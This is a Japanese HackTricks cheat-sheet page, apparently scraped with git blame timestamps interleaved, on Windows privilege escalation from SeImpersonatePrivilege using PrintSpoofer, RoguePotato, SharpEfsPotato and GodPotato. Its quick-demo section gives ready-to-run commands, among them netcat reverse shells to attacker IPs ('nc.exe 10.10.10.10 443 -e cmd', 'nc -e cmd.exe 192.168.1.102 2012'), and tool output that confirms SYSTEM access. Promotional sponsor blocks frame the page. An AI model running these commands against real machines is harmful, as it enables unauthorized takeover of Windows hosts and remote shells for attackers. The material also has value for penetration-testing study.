2023-04-13 22:25:26 +00:00
# RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato
2022-10-03 18:16:17 +00:00
< details >
2024-02-09 01:39:37 +00:00
< summary > < strong > ゼロからヒーローまでAWSハッキングを学ぶ< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( ) < / strong > < / a > < strong > ! < / strong > < / summary >
2022-10-03 18:16:17 +00:00
2024-02-08 03:59:37 +00:00
HackTricksをサポートする他の方法:
2024-01-02 22:36:59 +00:00
2024-02-08 03:59:37 +00:00
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS& ](https://peass.creator-spring.com )を入手する
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
2024-02-09 01:39:37 +00:00
* **💬 [Discordグループ ](https://discord.gg/hRep4RUj7f )**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )をフォローする。
* **HackTricks**および**HackTricks Cloud**のgithubリポジトリにPRを提出して、**あなたのハッキングテクニックを共有**してください。
2022-10-03 18:16:17 +00:00
< / details >
{% hint style="warning" %}
2024-02-09 01:39:37 +00:00
**JuicyPotatoは**Windows Server 2019およびWindows 10ビルド1809以降では**動作しません**。ただし、[**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**、**[**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**、**[**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**、**[**GodPotato**](https://github.com/BeichenDream/GodPotato)は、**同じ権限を利用して`NT AUTHORITY\SYSTEM`**レベルのアクセスを獲得するために使用できます。この[ブログ投稿](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)では、JuicyPotatoが動作しなくなったWindows 10およびServer 2019ホストで権限昇格特権を悪用するために使用できる`PrintSpoofer`ツールについて詳しく説明しています。
2022-10-03 18:16:17 +00:00
{% endhint %}
2023-07-07 23:42:27 +00:00
## クイックデモ
2022-10-03 18:16:17 +00:00
### PrintSpoofer
```bash
c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"
2023-07-07 23:42:27 +00:00
--------------------------------------------------------------------------------
2022-10-03 18:16:17 +00:00
2023-07-07 23:42:27 +00:00
[+] Found privilege: SeImpersonatePrivilege
2022-10-03 18:16:17 +00:00
2023-07-07 23:42:27 +00:00
[+] Named pipe listening...
2022-10-03 18:16:17 +00:00
2023-07-07 23:42:27 +00:00
[+] CreateProcessAsUser() OK
2022-10-03 18:16:17 +00:00
NULL
```
2023-11-05 22:41:08 +00:00
### RoguePotato
2023-07-07 23:42:27 +00:00
2023-11-05 22:41:08 +00:00
{% code overflow="wrap" %}
2022-10-03 18:16:17 +00:00
```bash
2023-11-05 22:41:08 +00:00
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999
# In some old versions you need to use the "-f" param
2022-10-03 18:16:17 +00:00
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999
```
2024-02-08 03:59:37 +00:00
{% endcode %}
2022-10-22 12:26:54 +00:00
### SharpEfsPotato
```
SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
SharpEfsPotato by @bugch3ck
2023-07-07 23:42:27 +00:00
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
2022-10-22 12:26:54 +00:00
2023-07-07 23:42:27 +00:00
Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0 .
2022-10-22 12:26:54 +00:00
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!
C:\temp>type C:\temp\w.log
nt authority\system
```
2023-04-13 22:25:26 +00:00
### GodPotato
2024-02-08 03:59:37 +00:00
### ゴッドポテト
2023-04-13 22:25:26 +00:00
```
GodPotato -cmd "cmd /c whoami"
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
```
2024-02-08 03:59:37 +00:00
## 参考文献
* [https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/ ](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/ )
* [https://github.com/itm4n/PrintSpoofer ](https://github.com/itm4n/PrintSpoofer )
* [https://github.com/antonioCoco/RoguePotato ](https://github.com/antonioCoco/RoguePotato )
* [https://github.com/bugch3ck/SharpEfsPotato ](https://github.com/bugch3ck/SharpEfsPotato )
* [https://github.com/BeichenDream/GodPotato ](https://github.com/BeichenDream/GodPotato )
2022-10-03 18:16:17 +00:00
< details >
2024-02-08 03:59:37 +00:00
< summary > < strong > ゼロからヒーローまでのAWSハッキングを学ぶ< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( ) < / strong > < / a > < strong > ! < / strong > < / summary >
2024-01-02 22:36:59 +00:00
2024-02-08 03:59:37 +00:00
HackTricksをサポートする他の方法:
2022-10-03 18:16:17 +00:00
2024-02-08 03:59:37 +00:00
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS& ](https://peass.creator-spring.com )を入手する
2024-02-09 01:39:37 +00:00
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* **💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )**をフォローする。**
* **HackTricks**および**HackTricks Cloud**のGitHubリポジトリにPRを提出して、**ハッキングトリックを共有**します。
2022-10-03 18:16:17 +00:00
< / details >
